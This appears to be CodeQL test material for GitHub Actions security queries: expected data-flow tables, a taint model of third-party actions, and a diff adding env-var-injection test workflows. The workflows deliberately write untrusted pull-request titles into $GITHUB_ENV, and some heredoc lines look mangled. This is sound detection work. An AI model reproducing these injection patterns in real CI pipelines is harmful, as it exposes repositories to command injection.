.github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | * | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV echo "EOF" >> $GITHUB_ENV - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "$TITLE" >> "${GITHUB_ENV}" echo "EOF" >> "${GITHUB_ENV}" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" + - run: | + cat <<-"EOF" >> "$GITHUB_ENV" + echo "$TITLE" + EOF diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 32379a7264f..31a550e3756 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -18,5 +20,9 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 77db4c10344..527808d10b0 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | 